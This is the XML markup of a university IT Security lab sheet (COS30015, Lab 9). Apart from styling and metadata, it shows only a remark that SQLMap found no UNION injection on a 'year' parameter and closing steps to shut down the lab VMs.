    </w:p>
    <w:p w14:paraId="6AE86B76" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="716F7078" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5B3AAD4B" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="75170044" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0E7231BC" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Note: SQLMap said that UNION injection was not possible with the year parameter. Stupid software</w:t>
      </w:r>
      <w:r w:rsidR="008F70A5">
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAA4AE" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3DBC8792" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kill everything, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9B626" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:r>
        <w:t>Close the VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD7591" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:r>
        <w:t>Log off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68542A7E" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
    <w:p w14:paraId="7FEF167C" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
      <w:r>
        <w:t xml:space="preserve">... or leave it running overnight. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E96C6" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
    <w:sectPr w:rsidR="00BC3434"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2BFA95" w14:textId="77777777" w:rsidR="0017567E" w:rsidRDefault="0017567E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33A76DF8" w14:textId="77777777" w:rsidR="0017567E" w:rsidRDefault="001756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1C875B" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF8" w:rsidP="005129A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381A293" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF8" w:rsidP="005129A9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2F69" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF8" w:rsidP="004003CD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B85B20">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="58D8852B" w14:textId="17A0C11F" w:rsidR="00286CF8" w:rsidRPr="001D494A" w:rsidRDefault="00D91864" w:rsidP="004003CD">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:rPr>
        <w:i/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>COS</w:t>
    </w:r>
    <w:r w:rsidR="009F5E05">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>001</w:t>
    </w:r>
    <w:r w:rsidR="009F5E05">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r w:rsidR="00286CF8" w:rsidRPr="00E2101B">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t xml:space="preserve"> Lab</w:t>
    </w:r>
    <w:r w:rsidR="005E3CC4">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>9</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="05799B0A" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRPr="004003CD" w:rsidRDefault="00286CF8" w:rsidP="004003C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53DB6" w14:textId="77777777" w:rsidR="0017567E" w:rsidRDefault="0017567E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5A2DAB8F" w14:textId="77777777" w:rsidR="0017567E" w:rsidRDefault="001756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CA0173" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF8" w:rsidP="004003CD">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4513"/>
        <w:tab w:val="clear" w:pos="9026"/>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:r w:rsidRPr="00E2101B">
      <w:rPr>
        <w:b/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>Name: ______________________________________ Student ID:______________</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2EA64EA7" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="3D242726" w14:textId="77777777" w:rsidR="00286CF8" w:rsidRDefault="00286CF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24687C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3B449A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28A219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909AF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C4FEDA8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3061C2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3CB26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D1820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8825BD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6B6C42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AE26B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3894E654"/>
    <w:lvl w:ilvl="0" w:tplc="A8B6C33C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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F96025E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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71872B2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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AFEC14E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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9A49530" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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0C0249C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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52C6424" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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B2B2E8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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C366670" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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5F95F6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27684D12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E033224"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5920BC0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13972C3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FA05756"/>
    <w:lvl w:ilvl="0" w:tplc="EAC29B0A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1864619F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3A60458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22820C49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5C05D1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22A37AA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1BE39B2"/>
    <w:lvl w:ilvl="0" w:tplc="0C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F5E203B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="650CD970"/>
    <w:lvl w:ilvl="0" w:tplc="48647B2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0BB0BC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B3206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9048A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E2DA6E5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2403C5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3DEC08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D76E1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1C984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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BDE23F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F9C484E"/>
    <w:lvl w:ilvl="0" w:tplc="2A102A9E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068FF8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532FF50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49EE1CC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DCE7F3A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CB4D810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0A83A2E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85AC640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CE6EE5E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CA57894"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D44E96C"/>
    <w:lvl w:ilvl="0" w:tplc="84C4D370">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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8B8ABBC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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09A81AA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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96CFA34" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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52D4B2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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D4044BC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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CAC60F6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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2CFE68" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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4E852D2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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8221734">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="807208990">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="432475439">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1871796259">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="119152873">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1378436758">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="625694570">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1137993907">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1569881411">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1221478924">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2050369911">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="70204356">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="148401364">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1423186643">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1352024175">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="554585632">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1785267966">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1803766437">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1494638495">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="260725323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hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="2122" style="mso-position-vertical-relative:line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027BD8"/>
    <w:rsid w:val="00002FED"/>
    <w:rsid w:val="00006120"/>
    <w:rsid w:val="00025878"/>
    <w:rsid w:val="00027BD8"/>
    <w:rsid w:val="00030764"/>
    <w:rsid w:val="0009350F"/>
    <w:rsid w:val="00094044"/>
    <w:rsid w:val="000A2F87"/>
    <w:rsid w:val="000B5F62"/>
    <w:rsid w:val="000B6983"/>
    <w:rsid w:val="000C0097"/>
    <w:rsid w:val="000E7C7F"/>
    <w:rsid w:val="001031F0"/>
    <w:rsid w:val="00125F75"/>
    <w:rsid w:val="00162791"/>
    <w:rsid w:val="001737A7"/>
    <w:rsid w:val="00173E9C"/>
    <w:rsid w:val="0017567E"/>
    <w:rsid w:val="00176537"/>
    <w:rsid w:val="00181E95"/>
    <w:rsid w:val="001947C6"/>
    <w:rsid w:val="001B36E7"/>
    <w:rsid w:val="001C01E1"/>
    <w:rsid w:val="001E1C17"/>
    <w:rsid w:val="001E1D57"/>
    <w:rsid w:val="001E799E"/>
    <w:rsid w:val="001E7C01"/>
    <w:rsid w:val="002329CF"/>
    <w:rsid w:val="00275186"/>
    <w:rsid w:val="00286CF8"/>
    <w:rsid w:val="002D3AD3"/>
    <w:rsid w:val="002E16D4"/>
    <w:rsid w:val="002F0A3B"/>
    <w:rsid w:val="00326113"/>
    <w:rsid w:val="00332951"/>
    <w:rsid w:val="003524BC"/>
    <w:rsid w:val="00393B50"/>
    <w:rsid w:val="003B6ACD"/>
    <w:rsid w:val="003C271D"/>
    <w:rsid w:val="003E3F29"/>
    <w:rsid w:val="003F49D9"/>
    <w:rsid w:val="004003CD"/>
    <w:rsid w:val="004009A0"/>
    <w:rsid w:val="004115F9"/>
    <w:rsid w:val="00415AA0"/>
    <w:rsid w:val="00432819"/>
    <w:rsid w:val="00432DF2"/>
    <w:rsid w:val="00433C69"/>
    <w:rsid w:val="00441542"/>
    <w:rsid w:val="00455D98"/>
    <w:rsid w:val="00497076"/>
    <w:rsid w:val="004A167D"/>
    <w:rsid w:val="004A1E87"/>
    <w:rsid w:val="004A69AB"/>
    <w:rsid w:val="004B6576"/>
    <w:rsid w:val="004E140F"/>
    <w:rsid w:val="004E1E93"/>
    <w:rsid w:val="004E5CBD"/>
    <w:rsid w:val="004F4695"/>
    <w:rsid w:val="005129A9"/>
    <w:rsid w:val="005222A6"/>
    <w:rsid w:val="00522FB6"/>
    <w:rsid w:val="005237DB"/>
    <w:rsid w:val="005307B5"/>
    <w:rsid w:val="0055279C"/>
    <w:rsid w:val="00563BD6"/>
    <w:rsid w:val="0059166F"/>
    <w:rsid w:val="00595590"/>
    <w:rsid w:val="005A1A21"/>
    <w:rsid w:val="005A6133"/>
    <w:rsid w:val="005C2A95"/>
    <w:rsid w:val="005E3CC4"/>
    <w:rsid w:val="00602254"/>
    <w:rsid w:val="006202D0"/>
    <w:rsid w:val="006411B7"/>
    <w:rsid w:val="006513B8"/>
    <w:rsid w:val="006700A1"/>
    <w:rsid w:val="0067443B"/>
    <w:rsid w:val="00676CD7"/>
    <w:rsid w:val="006904D3"/>
    <w:rsid w:val="006920FF"/>
    <w:rsid w:val="006B10E6"/>
    <w:rsid w:val="006C2001"/>
    <w:rsid w:val="006C3E7A"/>
    <w:rsid w:val="006C7F2E"/>
    <w:rsid w:val="006D1A44"/>
    <w:rsid w:val="006F06F2"/>
    <w:rsid w:val="006F3189"/>
    <w:rsid w:val="00702E80"/>
    <w:rsid w:val="00736D29"/>
    <w:rsid w:val="00740797"/>
    <w:rsid w:val="007610BB"/>
    <w:rsid w:val="007B37AC"/>
    <w:rsid w:val="007D77D1"/>
    <w:rsid w:val="007F7C4F"/>
    <w:rsid w:val="00822FA3"/>
    <w:rsid w:val="00833630"/>
    <w:rsid w:val="00870778"/>
    <w:rsid w:val="00872057"/>
    <w:rsid w:val="00875D52"/>
    <w:rsid w:val="008A5F2B"/>
    <w:rsid w:val="008B39F5"/>
    <w:rsid w:val="008D1C07"/>
    <w:rsid w:val="008F5BAD"/>
    <w:rsid w:val="008F70A5"/>
    <w:rsid w:val="00906415"/>
    <w:rsid w:val="0093697A"/>
    <w:rsid w:val="00954362"/>
    <w:rsid w:val="00956581"/>
    <w:rsid w:val="00977D88"/>
    <w:rsid w:val="00987420"/>
    <w:rsid w:val="009911B0"/>
    <w:rsid w:val="009B19DB"/>
    <w:rsid w:val="009B5F61"/>
    <w:rsid w:val="009C0820"/>
    <w:rsid w:val="009E2AF8"/>
    <w:rsid w:val="009E2C02"/>
    <w:rsid w:val="009E4619"/>
    <w:rsid w:val="009E60A1"/>
    <w:rsid w:val="009F5E05"/>
    <w:rsid w:val="00A0449A"/>
    <w:rsid w:val="00A10176"/>
    <w:rsid w:val="00A27719"/>
    <w:rsid w:val="00A51AFF"/>
    <w:rsid w:val="00A663AD"/>
    <w:rsid w:val="00A72816"/>
    <w:rsid w:val="00AA01B0"/>
    <w:rsid w:val="00AB14AB"/>
    <w:rsid w:val="00AB5A03"/>
    <w:rsid w:val="00AD676C"/>
    <w:rsid w:val="00B0677E"/>
    <w:rsid w:val="00B172C3"/>
    <w:rsid w:val="00B33617"/>
    <w:rsid w:val="00B40836"/>
    <w:rsid w:val="00B41FCB"/>
    <w:rsid w:val="00B514D7"/>
    <w:rsid w:val="00B529A4"/>
    <w:rsid w:val="00B52B6B"/>
    <w:rsid w:val="00B60A1B"/>
    <w:rsid w:val="00B85B20"/>
    <w:rsid w:val="00BC00BB"/>
    <w:rsid w:val="00BC3434"/>
    <w:rsid w:val="00BD17B8"/>
    <w:rsid w:val="00BE38DF"/>
    <w:rsid w:val="00BF12D0"/>
    <w:rsid w:val="00C25F97"/>
    <w:rsid w:val="00C65F92"/>
    <w:rsid w:val="00C74541"/>
    <w:rsid w:val="00C75C1D"/>
    <w:rsid w:val="00CA2469"/>
    <w:rsid w:val="00CA50C5"/>
    <w:rsid w:val="00CB3844"/>
    <w:rsid w:val="00CB384F"/>
    <w:rsid w:val="00CD04AE"/>
    <w:rsid w:val="00CF0804"/>
    <w:rsid w:val="00CF1F90"/>
    <w:rsid w:val="00D11B42"/>
    <w:rsid w:val="00D14DBB"/>
    <w:rsid w:val="00D91864"/>
    <w:rsid w:val="00D95720"/>
    <w:rsid w:val="00DA7692"/>
    <w:rsid w:val="00DC62DC"/>
    <w:rsid w:val="00DD72E9"/>
    <w:rsid w:val="00DE737E"/>
    <w:rsid w:val="00E05136"/>
    <w:rsid w:val="00E1175E"/>
    <w:rsid w:val="00E12339"/>
    <w:rsid w:val="00E215AA"/>
    <w:rsid w:val="00E3435A"/>
    <w:rsid w:val="00E401A8"/>
    <w:rsid w:val="00E662A5"/>
    <w:rsid w:val="00E76C77"/>
    <w:rsid w:val="00EC37E2"/>
    <w:rsid w:val="00EC40F2"/>
    <w:rsid w:val="00F002AB"/>
    <w:rsid w:val="00F12A13"/>
    <w:rsid w:val="00F47587"/>
    <w:rsid w:val="00F51926"/>
    <w:rsid w:val="00F65684"/>
    <w:rsid w:val="00F65BAA"/>
    <w:rsid w:val="00F67672"/>
    <w:rsid w:val="00F74C83"/>
    <w:rsid w:val="00F8523C"/>
    <w:rsid w:val="00FA1161"/>
    <w:rsid w:val="00FA1F42"/>
    <w:rsid w:val="00FE47C4"/>
    <w:rsid w:val="00FF7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122" style="mso-position-vertical-relative:line" fillcolor="white">
      <v:fill color="white"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="2"/>
      <o:rules v:ext="edit">
        <o:r id="V:Rule1" type="callout" idref="#_x0000_s2111"/>
        <o:r id="V:Rule2" type="callout" idref="#_x0000_s2113"/>
        <o:r id="V:Rule3" type="callout" idref="#_x0000_s2115"/>
        <o:r id="V:Rule4" type="callout" idref="#_x0000_s2117"/>
        <o:r id="V:Rule5" type="callout" idref="#_x0000_s2118"/>
      </o:rules>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="0EABB795"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4DF0C3A0-A0A2-440D-82CF-D1DB160EBC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eastAsia="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00A663AD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27BD8"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rsid w:val="00D14DBB"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:rsid w:val="005129A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5129A9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004003CD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004003CD"/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003C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4003CD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rsid w:val="004003CD"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006700A1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US" w:eastAsia="en-U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E46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9E4619"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="009E4619"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs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951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5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8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117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919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477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3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7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48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1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697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6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7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99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93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7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1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3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2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6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12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://www.control.com:88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953</Words>
  <Characters>5434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COS30015 IT Security</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Swinburne University of Technology</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6375</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:i4>2162791</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.control.com:88/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COS30015 IT Security</dc:title>
  <dc:subject/>
  <dc:creator>Faculty of ICT</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>YI TIAN</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2017-07-21T04:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-24T02:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-24T02:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>